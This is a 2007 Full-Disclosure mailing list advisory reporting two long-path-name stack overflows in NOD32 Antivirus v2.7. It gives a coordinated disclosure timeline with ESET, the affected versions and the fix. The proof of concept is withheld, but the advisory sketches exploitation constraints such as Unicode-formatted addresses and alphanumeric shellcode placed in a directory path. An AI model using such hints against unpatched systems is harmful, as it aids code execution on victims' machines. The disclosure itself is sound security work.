> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] NOD32 Antivirus Long Path Name Stack Overflow Vulnerabilities

[Ismael Briones]

NOD32 Antivirus Long Path Name Stack Overflow Vulnerabilities

I - DESCRIPTION

NOD32 Antivirus is vulnerable to two stack overflow vulnerabilities.
The vulnerabilities can be exploited when the AV tries to
delete/disinfect or rename a detected malware in a specially formated
directory.

These vulnerabilities can lead to local/remote arbitrary code execution.


II - DISCLOSURE TIMELINE

19/04/2007 - First Vulnerability reported to ESET
19/04/2007 - ESET Response
20/04/2007 - Vulnerability Analysis and PoC sent to ESET
20/04/2007 - ESET initial feedback
24/04/2007 - Confirmed the bug and fixed
07/05/2007 - ESET made available the updates
10/05/2007 - A second vulnerability was founded and reported to ESET
with a PoC an analysis
10/05/2007 - ESET response, Confirmed the bug and fixed
15/05/2007 - ESET made available the updates
19/05/2007 - Coordinated public disclosure

III - AFFECTED PRODUCTS

NOD32 Antivirus v2.7 (Windows version) (Versions prior to the update
2.70.37.0)

IV - ADVANCED DESCRIPTION

It's not going to be publicly available, nevertheless it has been only
shared with ESET.

V - EXPLOITATION

A PoC has been developed to probe the vulnerability, but it's not going
to be publicly available. It has been only shared with ESET.

Although the vulnerabilities are hard to exploit, it's not impossible.
There are some restrictions to bypass:

   - The path name is formated in Unicode, so we have to find an opcode
in an address with an unicode format
   - The shellcode has to be in the path name so we have to use an
Alphanumeric shellcode


VI - SOLUTION

The vulnerabilities was reported on April 19 and on May 10. An update
has been issued on May 18 to solve these vulnerabilities through the
regular update mechanism.

VII - CREDIT

Bug found by Ismael Briones 
[http://www.inkatel.com]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/